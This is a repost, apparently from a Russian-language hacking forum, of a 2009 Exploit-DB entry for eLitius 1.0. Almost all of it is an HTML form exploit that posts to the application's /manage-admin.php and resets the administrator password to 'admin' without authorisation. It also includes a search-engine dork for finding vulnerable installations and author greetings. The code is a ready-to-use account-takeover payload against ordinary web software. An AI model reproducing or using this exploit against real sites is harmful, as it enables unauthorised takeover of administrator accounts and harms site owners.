Exploit eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8459
Проверка EDB
  1. Пройдено
Автор
THE G0BL!N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-04-16
HTML:
 <title> Powered by eLitius Version 1.0 Change Password </title>
  
<form action="http://esyndicat.org/admin/manage-admin.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td>
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tbody>
    <tr>
     <th colspan="2">Change Password Of admin </th>
    </tr>
    <tr>
     
     
    </tr>
    <tr>
     <td>Username:</td>
     <td>
      <input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" />
     </td>
    </tr><tr>
     <td>Password:</td>
     <td>
      <input class="inputbox" name="password" size="40" value="admin" type="text" />
     </td>
    </tr>
    <tr>
     <td>Email:</td>
     <td><input class="inputbox" name="email" size="40" value="[email protected]" type="text" /></td>
    </tr>
    <tr>
     <td colspan="2">&nbsp;
     </td>
    </tr>

    </tbody>
    </table>
    <input name="task" value="" type="hidden" />
    <div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"></div>    
   </td>
   <td style="vertical-align: top; margin: 0; padding: 0;">
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tr>
     <th colspan="2">Dork: Powered by eLitius Version 1.0</th>
    </tr>
<th colspan="2">Greetz To: Dos-Dz TeaM Snakes TeaM His0k4 </th>
    <tr>
     <center><td style="font-weight: bold;">Cod[3]d By ThE g0bL!N</td> </center>
    </tr>
  </table>
  </td>
  </tr>
  </tbody>
  </table>
  <input name="cid[]" value="1" type="hidden" />
<td>Download:http://www.elitius.com/</td>
</form>
 
</body>
</html>

# milw0rm.com [2009-04-16]
 
Источник
www.exploit-db.com

Похожие темы